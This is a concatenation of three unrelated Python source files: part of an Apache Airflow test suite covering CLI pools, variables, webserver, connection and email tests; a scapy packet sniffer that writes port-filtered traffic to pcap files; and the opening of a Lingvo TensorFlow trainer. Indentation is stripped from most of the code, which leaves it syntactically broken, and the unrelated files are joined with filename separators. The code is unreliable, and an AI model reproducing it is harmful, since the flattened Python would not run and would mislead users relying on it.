'does_not_exist_dag',
'--yes'])
)
def test_delete_dag_existing_file(self):
        # Test that the DAG is deleted even if the file
        # containing it still exists
DM = DagModel
key = "my_dag_id"
session = settings.Session()
with tempfile.NamedTemporaryFile() as f:
session.add(DM(dag_id=key, fileloc=f.name))
session.commit()
cli.delete_dag(self.parser.parse_args([
'dags', 'delete', key, '--yes']))
self.assertEqual(session.query(DM).filter_by(dag_id=key).count(), 0)
def test_pool_create(self):
cli.pool_set(self.parser.parse_args(['pools', 'set', 'foo', '1', 'test']))
self.assertEqual(self.session.query(Pool).count(), 1)
def test_pool_get(self):
cli.pool_set(self.parser.parse_args(['pools', 'set', 'foo', '1', 'test']))
try:
cli.pool_get(self.parser.parse_args(['pools', 'get', 'foo']))
except Exception as e:
self.fail("The 'pool -g foo' command raised unexpectedly: %s" % e)
def test_pool_delete(self):
cli.pool_set(self.parser.parse_args(['pools', 'set', 'foo', '1', 'test']))
cli.pool_delete(self.parser.parse_args(['pools', 'delete', 'foo']))
self.assertEqual(self.session.query(Pool).count(), 0)
def test_pool_import_export(self):
# Create two pools first
pool_config_input = {
"foo": {
"description": "foo_test",
"slots": 1
},
"baz": {
"description": "baz_test",
"slots": 2
}
}
with open('pools_import.json', mode='w') as file:
json.dump(pool_config_input, file)
# Import json
try:
cli.pool_import(self.parser.parse_args(['pools', 'import', 'pools_import.json']))
except Exception as e:
self.fail("The 'pool import pools_import.json' failed: %s" % e)
# Export json
try:
cli.pool_export(self.parser.parse_args(['pools', 'export', 'pools_export.json']))
except Exception as e:
self.fail("The 'pool export pools_export.json' failed: %s" % e)
with open('pools_export.json', mode='r') as file:
pool_config_output = json.load(file)
self.assertEqual(
pool_config_input,
pool_config_output,
"Input and output pool files are not same")
os.remove('pools_import.json')
os.remove('pools_export.json')
def test_variables(self):
# Checks if all subcommands are properly received
cli.variables_set(self.parser.parse_args([
'variables', 'set', 'foo', '{"foo":"bar"}']))
cli.variables_get(self.parser.parse_args([
'variables', 'get', 'foo']))
cli.variables_get(self.parser.parse_args([
'variables', 'get', 'baz', '-d', 'bar']))
cli.variables_list(self.parser.parse_args([
'variables', 'list']))
cli.variables_delete(self.parser.parse_args([
'variables', 'delete', 'bar']))
cli.variables_import(self.parser.parse_args([
'variables', 'import', DEV_NULL]))
cli.variables_export(self.parser.parse_args([
'variables', 'export', DEV_NULL]))
cli.variables_set(self.parser.parse_args([
'variables', 'set', 'bar', 'original']))
# First export
cli.variables_export(self.parser.parse_args([
'variables', 'export', 'variables1.json']))
first_exp = open('variables1.json', 'r')
cli.variables_set(self.parser.parse_args([
'variables', 'set', 'bar', 'updated']))
cli.variables_set(self.parser.parse_args([
'variables', 'set', 'foo', '{"foo":"oops"}']))
cli.variables_delete(self.parser.parse_args([
'variables', 'delete', 'foo']))
# First import
cli.variables_import(self.parser.parse_args([
'variables', 'import', 'variables1.json']))
self.assertEqual('original', Variable.get('bar'))
self.assertEqual('{\n "foo": "bar"\n}', Variable.get('foo'))
# Second export
cli.variables_export(self.parser.parse_args([
'variables', 'export', 'variables2.json']))
second_exp = open('variables2.json', 'r')
self.assertEqual(first_exp.read(), second_exp.read())
second_exp.close()
first_exp.close()
# Second import
cli.variables_import(self.parser.parse_args([
'variables', 'import', 'variables2.json']))
self.assertEqual('original', Variable.get('bar'))
self.assertEqual('{\n "foo": "bar"\n}', Variable.get('foo'))
# Set a dict
cli.variables_set(self.parser.parse_args([
'variables', 'set', 'dict', '{"foo": "oops"}']))
# Set a list
cli.variables_set(self.parser.parse_args([
'variables', 'set', 'list', '["oops"]']))
# Set str
cli.variables_set(self.parser.parse_args([
'variables', 'set', 'str', 'hello string']))
# Set int
cli.variables_set(self.parser.parse_args([
'variables', 'set', 'int', '42']))
# Set float
cli.variables_set(self.parser.parse_args([
'variables', 'set', 'float', '42.0']))
# Set true
cli.variables_set(self.parser.parse_args([
'variables', 'set', 'true', 'true']))
# Set false
cli.variables_set(self.parser.parse_args([
'variables', 'set', 'false', 'false']))
# Set none
cli.variables_set(self.parser.parse_args([
'variables', 'set', 'null', 'null']))
# Export and then import
cli.variables_export(self.parser.parse_args([
'variables', 'export', 'variables3.json']))
cli.variables_import(self.parser.parse_args([
'variables', 'import', 'variables3.json']))
# Assert value
self.assertEqual({'foo': 'oops'}, models.Variable.get('dict', deserialize_json=True))
self.assertEqual(['oops'], models.Variable.get('list', deserialize_json=True))
self.assertEqual('hello string', models.Variable.get('str')) # cannot json.loads(str)
self.assertEqual(42, models.Variable.get('int', deserialize_json=True))
self.assertEqual(42.0, models.Variable.get('float', deserialize_json=True))
self.assertEqual(True, models.Variable.get('true', deserialize_json=True))
self.assertEqual(False, models.Variable.get('false', deserialize_json=True))
self.assertEqual(None, models.Variable.get('null', deserialize_json=True))
os.remove('variables1.json')
os.remove('variables2.json')
os.remove('variables3.json')
def _wait_pidfile(self, pidfile):
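        # Poll once per second until the pid file exists and contains a
        # parsable integer pid.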
while True:
try:
with open(pidfile) as file:
return int(file.read())
except Exception:
sleep(1)
def test_cli_webserver_foreground(self):
# Confirm that webserver hasn't been launched.
# pgrep returns exit status 1 if no process matched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in foreground and terminate it.
p = subprocess.Popen(["airflow", "webserver"])
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_foreground_with_pid(self):
# Run webserver in foreground with --pid option
pidfile = tempfile.mkstemp()[1]
p = subprocess.Popen(["airflow", "webserver", "--pid", pidfile])
# Check the file specified by --pid option exists
self._wait_pidfile(pidfile)
# Terminate webserver
p.terminate()
p.wait()
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_background(self):
import psutil
# Confirm that webserver hasn't been launched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in background.
subprocess.Popen(["airflow", "webserver", "-D"])
pidfile = cli.setup_locations("webserver")[0]
self._wait_pidfile(pidfile)
# Assert that gunicorn and its monitor are launched.
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Terminate monitor process.
pidfile = cli.setup_locations("webserver-monitor")[0]
pid = self._wait_pidfile(pidfile)
p = psutil.Process(pid)
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Patch for causing webserver timeout
@mock.patch("airflow.bin.cli.get_num_workers_running", return_value=0)
def test_cli_webserver_shutdown_when_gunicorn_master_is_killed(self, _):
        # Shorten the timeout so that this test doesn't take too long
args = self.parser.parse_args(['webserver'])
with conf_vars({('webserver', 'web_server_master_timeout'): '10'}):
with self.assertRaises(SystemExit) as e:
cli.webserver(args)
self.assertEqual(e.exception.code, 1)
class FakeWebHDFSHook:
def __init__(self, conn_id):
self.conn_id = conn_id
def get_conn(self):
return self.conn_id
def check_for_path(self, hdfs_path):
return hdfs_path
class FakeSnakeBiteClientException(Exception):
pass
class FakeSnakeBiteClient:
def __init__(self):
self.started = True
def ls(self, path, include_toplevel=False):
"""
the fake snakebite client
:param path: the array of path to test
:param include_toplevel: to return the toplevel directory info
:return: a list for path for the matching queries
"""
if path[0] == '/datadirectory/empty_directory' and not include_toplevel:
return []
elif path[0] == '/datadirectory/datafile':
return [{
'group': 'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': 'hdfs',
'path': '/datadirectory/datafile'
}]
elif path[0] == '/datadirectory/empty_directory' and include_toplevel:
return [{
'group': 'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': 'hdfs',
'path': '/datadirectory/empty_directory'
}]
elif path[0] == '/datadirectory/not_empty_directory' and include_toplevel:
return [{
'group': 'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': 'hdfs',
'path': '/datadirectory/empty_directory'
}, {
'group': 'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': 'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_empty_directory':
return [{
'group': 'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': 'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_existing_file_or_directory':
raise FakeSnakeBiteClientException
elif path[0] == '/datadirectory/regex_dir':
return [{
'group': 'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862, 'length': 12582912,
'blocksize': 134217728,
'owner': 'hdfs',
'path': '/datadirectory/regex_dir/test1file'
}, {
'group': 'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': 'hdfs',
'path': '/datadirectory/regex_dir/test2file'
}, {
'group': 'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': 'hdfs',
'path': '/datadirectory/regex_dir/test3file'
}, {
'group': 'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': 'hdfs',
'path': '/datadirectory/regex_dir/copying_file_1.txt._COPYING_'
}, {
'group': 'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': 'hdfs',
'path': '/datadirectory/regex_dir/copying_file_3.txt.sftp'
}]
else:
raise FakeSnakeBiteClientException
class FakeHDFSHook:
def __init__(self, conn_id=None):
self.conn_id = conn_id
def get_conn(self):
client = FakeSnakeBiteClient()
return client
class TestConnection(unittest.TestCase):
def setUp(self):
utils.db.initdb()
os.environ['AIRFLOW_CONN_TEST_URI'] = (
'postgres://username:password@ec2.compute.com:5432/the_database')
os.environ['AIRFLOW_CONN_TEST_URI_NO_CREDS'] = (
'postgres://ec2.compute.com/the_database')
def tearDown(self):
env_vars = ['AIRFLOW_CONN_TEST_URI', 'AIRFLOW_CONN_AIRFLOW_DB']
for ev in env_vars:
if ev in os.environ:
del os.environ[ev]
def test_using_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
def test_using_unix_socket_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri_no_creds')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertIsNone(c.login)
self.assertIsNone(c.password)
self.assertIsNone(c.port)
def test_param_setup(self):
c = Connection(conn_id='local_mysql', conn_type='mysql',
host='localhost', login='airflow',
password='airflow', schema='airflow')
self.assertEqual('localhost', c.host)
self.assertEqual('airflow', c.schema)
self.assertEqual('airflow', c.login)
self.assertEqual('airflow', c.password)
self.assertIsNone(c.port)
def test_env_var_priority(self):
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertNotEqual('ec2.compute.com', c.host)
os.environ['AIRFLOW_CONN_AIRFLOW_DB'] = \
'postgres://username:password@ec2.compute.com:5432/the_database'
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
del os.environ['AIRFLOW_CONN_AIRFLOW_DB']
def test_dbapi_get_uri(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', hook.get_uri())
conn2 = BaseHook.get_connection(conn_id='test_uri_no_creds')
hook2 = conn2.get_hook()
self.assertEqual('postgres://ec2.compute.com/the_database', hook2.get_uri())
def test_dbapi_get_sqlalchemy_engine(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
engine = hook.get_sqlalchemy_engine()
self.assertIsInstance(engine, sqlalchemy.engine.Engine)
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', str(engine.url))
def test_get_connections_env_var(self):
conns = SqliteHook.get_connections(conn_id='test_uri')
assert len(conns) == 1
assert conns[0].host == 'ec2.compute.com'
assert conns[0].schema == 'the_database'
assert conns[0].login == 'username'
assert conns[0].password == 'password'
assert conns[0].port == 5432
class TestWebHDFSHook(unittest.TestCase):
def test_simple_init(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook()
self.assertIsNone(c.proxy_user)
def test_init_proxy_user(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook(proxy_user='someone')
self.assertEqual('someone', c.proxy_user)
# Optional HDFS dependencies: guard the imports so that HDFSHook falls back
# to None and the HDFS tests below are skipped when the hook or snakebite
# is not installed.
try:
    from airflow.hooks import hdfs_hook
    import snakebite
    HDFSHook = hdfs_hook.HDFSHook  # type: Optional[hdfs_hook.HDFSHook]
except ImportError:
    HDFSHook = None  # type: Optional[hdfs_hook.HDFSHook]
    snakebite = None  # type: None
@unittest.skipIf(HDFSHook is None,
"Skipping test because HDFSHook is not installed")
class TestHDFSHook(unittest.TestCase):
def setUp(self):
os.environ['AIRFLOW_CONN_HDFS_DEFAULT'] = 'hdfs://localhost:8020'
def test_get_client(self):
client = HDFSHook(proxy_user='foo').get_conn()
self.assertIsInstance(client, snakebite.client.Client)
self.assertEqual('localhost', client.host)
self.assertEqual(8020, client.port)
self.assertEqual('foo', client.service.channel.effective_user)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_autoconfig_client(self, mock_get_connections,
MockAutoConfigClient):
c = Connection(conn_id='hdfs', conn_type='hdfs',
host='localhost', port=8020, login='foo',
extra=json.dumps({'autoconfig': True}))
mock_get_connections.return_value = [c]
HDFSHook(hdfs_conn_id='hdfs').get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user='foo',
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
def test_get_autoconfig_client_no_conn(self, MockAutoConfigClient):
HDFSHook(hdfs_conn_id='hdfs_missing', autoconfig=True).get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user=None,
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_ha_client(self, mock_get_connections):
c1 = Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost', port=8020)
c2 = Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost2', port=8020)
mock_get_connections.return_value = [c1, c2]
client = HDFSHook().get_conn()
self.assertIsInstance(client, snakebite.client.HAClient)
send_email_test = mock.Mock()
class TestEmail(unittest.TestCase):
def setUp(self):
conf.remove_option('email', 'EMAIL_BACKEND')
@mock.patch('airflow.utils.email.send_email')
def test_default_backend(self, mock_send_email):
res = utils.email.send_email('to', 'subject', 'content')
mock_send_email.assert_called_once_with('to', 'subject', 'content')
self.assertEqual(mock_send_email.return_value, res)
@mock.patch('airflow.utils.email.send_email_smtp')
def test_custom_backend(self, mock_send_email):
with conf_vars({('email', 'email_backend'): 'tests.core.send_email_test'}):
utils.email.send_email('to', 'subject', 'content')
send_email_test.assert_called_once_with(
'to', 'subject', 'content', files=None, dryrun=False,
cc=None, bcc=None, mime_charset='utf-8', mime_subtype='mixed')
self.assertFalse(mock_send_email.called)
class TestEmailSmtp(unittest.TestCase):
def setUp(self):
conf.set('smtp', 'SMTP_SSL', 'False')
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name])
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
filename = 'attachment; filename="' + os.path.basename(attachment.name) + '"'
self.assertEqual(filename, msg.get_payload()[-1].get('Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp_with_multibyte_content(self, mock_send_mime):
utils.email.send_email_smtp('to', 'subject', '🔥', mime_charset='utf-8')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
msg = call_args[2]
mimetext = MIMEText('🔥', 'mixed', 'utf-8')
self.assertEqual(mimetext.get_payload(), msg.get_payload()[0].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_bcc_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name], cc='cc', bcc='bcc')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to', 'cc', 'bcc'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
self.assertEqual('attachment; filename="' + os.path.basename(attachment.name) + '"',
msg.get_payload()[-1].get('Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime(self, mock_smtp, mock_smtp_ssl):
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
msg = MIMEMultipart()
utils.email.send_MIME_email('from', 'to', msg, dryrun=False)
mock_smtp.assert_called_once_with(
conf.get('smtp', 'SMTP_HOST'),
conf.getint('smtp', 'SMTP_PORT'),
)
self.assertTrue(mock_smtp.return_value.starttls.called)
mock_smtp.return_value.login.assert_called_once_with(
conf.get('smtp', 'SMTP_USER'),
conf.get('smtp', 'SMTP_PASSWORD'),
)
mock_smtp.return_value.sendmail.assert_called_once_with('from', 'to', msg.as_string())
self.assertTrue(mock_smtp.return_value.quit.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_ssl(self, mock_smtp, mock_smtp_ssl):
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
with conf_vars({('smtp', 'smtp_ssl'): 'True'}):
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp.called)
mock_smtp_ssl.assert_called_once_with(
conf.get('smtp', 'SMTP_HOST'),
conf.getint('smtp', 'SMTP_PORT'),
)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_noauth(self, mock_smtp, mock_smtp_ssl):
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
with conf_vars({
('smtp', 'smtp_user'): None,
('smtp', 'smtp_password'): None,
}):
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp_ssl.called)
mock_smtp.assert_called_once_with(
conf.get('smtp', 'SMTP_HOST'),
conf.getint('smtp', 'SMTP_PORT'),
)
        self.assertFalse(mock_smtp.return_value.login.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_dryrun(self, mock_smtp, mock_smtp_ssl):
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=True)
self.assertFalse(mock_smtp.called)
self.assertFalse(mock_smtp_ssl.called)
if __name__ == '__main__':
unittest.main()
|
sniffer.py
|
import threading
import os
import layers.packet
from scapy.all import sniff
from scapy.utils import PcapWriter
class Sniffer():
"""
    The Sniffer class lets the user begin and end sniffing at will, writing
    packets that match a given port filter to a given pcap location.
    Call start_sniffing to begin sniffing and stop_sniffing to stop sniffing.
"""
def __init__(self, location, port, logger):
"""
        Initializes a sniffer object.
Needs a location and a port to filter on.
"""
self.stop_sniffing_flag = False
self.location = location
self.port = port
self.pcap_thread = None
self.packet_dumper = None
self.logger = logger
full_path = os.path.dirname(location)
assert port, "Need to specify a port in order to launch a sniffer"
if not os.path.exists(full_path):
os.makedirs(full_path)
def __packet_callback(self, scapy_packet):
"""
        This callback is called on every packet that is sniffed.
        Returns True if sniffing should stop, otherwise False.
"""
packet = layers.packet.Packet(scapy_packet)
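        # for/else: the else branch runs only if no TCP/UDP layer matches the
        # filtered port, so non-matching packets are skipped without logging.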
for proto in ["TCP", "UDP"]:
if(packet.haslayer(proto) and ((packet[proto].sport == self.port) or (packet[proto].dport == self.port))):
break
else:
return self.stop_sniffing_flag
self.logger.debug(str(packet))
self.packet_dumper.write(scapy_packet)
return self.stop_sniffing_flag
def __spawn_sniffer(self):
"""
        Saves pcaps to a file. Should be run as a thread.
        Ends when the stop_sniffing_flag is set. Should not be called by the user.
"""
self.packet_dumper = PcapWriter(self.location, append=True, sync=True)
        while not self.stop_sniffing_flag:
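            # sniff() returns after at most 1 second so the stop flag is
            # re-checked even when no packets arrive.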
sniff(stop_filter=self.__packet_callback, timeout=1)
def start_sniffing(self):
"""
Starts sniffing. Should be called by user.
"""
self.stop_sniffing_flag = False
self.pcap_thread = threading.Thread(target=self.__spawn_sniffer)
self.pcap_thread.start()
self.logger.debug("Sniffer starting to port %d" % self.port)
def __enter__(self):
"""
Defines a context manager for this sniffer; simply starts sniffing.
"""
self.start_sniffing()
return self
def __exit__(self, exc_type, exc_value, tb):
"""
Defines exit context manager behavior for this sniffer; simply stops sniffing.
"""
self.stop_sniffing()
def stop_sniffing(self):
"""
Stops the sniffer by setting the flag and calling join
"""
if(self.pcap_thread):
self.stop_sniffing_flag = True
self.pcap_thread.join()
self.logger.debug("Sniffer stopping")
|
trainer.py
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=line-too-long
"""Trainer.
To run locally:
.. code-block:: bash
$ bazel build -c opt //lingvo:trainer
$ bazel-bin/lingvo/trainer --logtostderr \
--model=image.mnist.LeNet5 --mode=sync --logdir=/tmp/lenet5 --run_locally=cpu
To use GPU, add `--config=cuda` to build command and set `--run_locally=gpu`.
"""
# pylint: enable=line-too-long
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import inspect
import os
import re
import threading
import time
import numpy as np
import six
from six.moves import zip
import tensorflow as tf
from lingvo import base_runner
from tensorflow.core.protobuf import config_pb2
from lingvo import base_trial
from lingvo import model_registry
from lingvo.core import base_model
from lingvo.core import base_model_params
from lingvo.core import cluster_factory
from lingvo.core import inference_graph_exporter
from lingvo.core import metrics
from lingvo.core import py_utils
tf.flags.DEFINE_string(
'model', '', 'Name of the model class to train. Must be one of those'
' defined in models.py.')
tf.flags.DEFINE_string(
'model_task_name', '', 'For multitask models: '
'select task to train/evaluate/decode. '
'Empty means to sample a task (training only).')
tf.flags.DEFINE_string('logdir', '', 'Log directory.')
tf.flags.DEFINE_bool(
'interactive', False,
'If True, enter interactive IPython for the controller job.')
tf.flags.DEFINE_string(
'run_locally', None,
'If True, ignores flags below and runs controller and trainer '
    'in a single process.')
tf.flags.DEFINE_string('tf_master', '', 'TF runtime.')
tf.flags.DEFINE_string(
'cluster_spec', '', 'A tf.train.ClusterSpec to override the master. '
'The dict is specified as: job=host1:port1,host2:port2,'
'host3:port3@job2=host3:port4,...')
tf.flags.DEFINE_string(
'mode', 'async', 'How this trainer binary is used. '
'async: used in an async training setup; '
'sync: used in a sync training setup; '
'shell: an interactive shell for development; '
'inspect_evaler: print evaler dataset names; '
'inspect_decoder: print decoder dataset names; '
'write_inference_graph: write inference graphs to logdir.')
tf.flags.DEFINE_string('job', '', 'trainer/controller/eval, etc.')
tf.flags.DEFINE_integer('task', 0, 'Task id within the job.')
tf.flags.DEFINE_string('controller_job', '/job:controller', 'Job name.')
tf.flags.DEFINE_integer('controller_gpus', 0, 'Number of controller GPUs.')
tf.flags.DEFINE_string('worker_job', '/job:trainer', 'Job name.')
tf.flags.DEFINE_integer('worker_replicas', 1, 'Number of replicas.')
tf.flags.DEFINE_integer('worker_gpus', 0, 'Number of gpus to use per replica.')
tf.flags.DEFINE_integer('worker_tpus', 0, 'Number of tpus to use per replica.')
tf.flags.DEFINE_integer('worker_num_tpu_hosts', 0, 'Number of tpu hosts.')
tf.flags.DEFINE_integer('worker_split_size', 1,
'Number of devices for one split.')
tf.flags.DEFINE_string('ps_job', '/job:ps', 'Job name')
tf.flags.DEFINE_integer('ps_replicas', 1, 'Number of replicas.')
tf.flags.DEFINE_integer('ps_gpus', 0, 'Number of gpus to use per replica.')
tf.flags.DEFINE_string('input_job', '/job:input', 'Job name')
tf.flags.DEFINE_integer('input_replicas', 0, 'Number of replicas.')
tf.flags.DEFINE_string('evaler_job', '/job:evaler', 'Job name')
tf.flags.DEFINE_integer('evaler_replicas', 0, 'Number of replicas.')
tf.flags.DEFINE_integer('evaler_gpus', 0, 'Number of gpus to use per replica.')
tf.flags.DEFINE_string('decoder_job', '/job:decoder', 'Job name')
tf.flags.DEFINE_integer('decoder_replicas', 0, 'Number of replicas.')
tf.flags.DEFINE_integer('decoder_gpus', 0, 'Number of gpus to use per replica.')
tf.flags.DEFINE_bool(
'evaler_in_same_address_as_controller', False,
'Whether or not evaler is in the same address space as '
    'controller. This flag is meant for unittest only.')
tf.flags.DEFINE_string(
'vizier_reporting_job', 'evaler',
    'Job responsible for reporting metrics. This specifies a '
'job prefix, evaler will match all evaler jobs, while '
'evaler_dev and decoder_dev will only match the corresponding '
'jobs that are on the dev set.')
FLAGS = tf.flags.FLAGS
# useful for debugging.
def _StartShell(local_ns=None):
# An interactive shell is useful for debugging/development.
import IPython # pylint: disable=g-import-not-at-top
user_ns = {}
if local_ns:
user_ns.update(local_ns)
user_ns.update(globals())
IPython.start_ipython(argv=[], user_ns=user_ns)
def _ModelAnalysis(model):
"""Returns a text showing variable sizes and their total size."""
class Analyzer(object):
def __init__(self):
self._seen_var = {}
self.total = 0
def __call__(self, v):
assert isinstance(v, tf.Variable)
# pylint: disable=protected-access
if not v.shape.is_fully_defined():
# Only Cudnn RNN params lack static shapes.
if hasattr(v, 'approx_size'):
size = v.approx_size
else:
return '%-20s %10s %s' % (v.shape, 'n/a', v._shared_name)
else:
size = v.shape.num_elements()
if v._shared_name not in self._seen_var:
self._seen_var[v._shared_name] = size
self.total += size
return '%-20s %10d %s' % (v.shape, size, v._shared_name)
analyzer = Analyzer()
output = '\n'
output += model.vars.Transform(analyzer).DebugString()
output += '\n'
output += '=' * 100
output += '\ntotal #params: %10d\n' % (analyzer.total)
return output, analyzer.total
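# Illustrative output of _ModelAnalysis (variable name and sizes hypothetical):
#   (300, 4096)            1228800 lenet5/conv/w
# one such '%-20s %10d %s' line per variable, followed by a '=' rule and a
# 'total #params:' line.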
class Controller(base_runner.BaseRunner):
"""Controller for a training cluster."""
def __init__(self, *args, **kwargs):
super(Controller, self).__init__(*args, **kwargs)
assert not self._model_task_name, 'Controller needs all tasks!'
self._save_path = os.path.join(self._train_dir, 'ckpt')
tf.gfile.MakeDirs(self._train_dir)
self._control_dir = os.path.join(self._logdir, 'control')
tf.gfile.MakeDirs(self._control_dir)
self._summary_writer = self._CreateSummaryWriter(self._control_dir)
self._time_steps = [] # A short history of (timestamp, global_step)
with self._graph.as_default(), tf.container(self._container_id):
with self._cluster, tf.device(self._cluster.GetPlacer()):
self._model = self.params.cls(self.params)
self._params = self._model.params
self._model.ConstructFPropBPropGraph()
self._saver = self._GetSaver()
self._summary_op = tf.summary.merge_all()
self._vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES)
self._uninitialized = tf.report_uninitialized_variables(self._vars)
self._initialize_all = tf.global_variables_initializer()
self.initialize_tables = tf.tables_initializer()
